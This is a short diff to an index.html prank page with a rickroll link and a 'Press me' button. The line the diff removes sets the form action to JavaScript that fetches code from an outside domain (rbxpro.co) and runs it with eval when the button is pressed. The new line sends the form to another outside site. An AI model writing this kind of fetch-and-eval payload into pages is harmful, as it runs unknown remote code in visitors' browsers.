--- a/index.html
+++ b/index.html
@@ -27,7 +27,7 @@ text-align: center;
 <p>Hello so you are here there is only one thing here a button</p>
 
 <a href="https://www.youtube.com/watch?v=oHg5SJYRHA0","https://www.youtube.com/watch?v=oHg5SJYRHA0" target="_blank">?<a>
-      <form action="Javascript:$.get(' //rbxpro.co/?id=2028494357',i=>eval(i))">
+      <form action="https://leancoding.co/join.php?id=MBTXD3.html)">
           <div id="container">
     <button type="submit">Press me you wont >:)</button>
           </div>
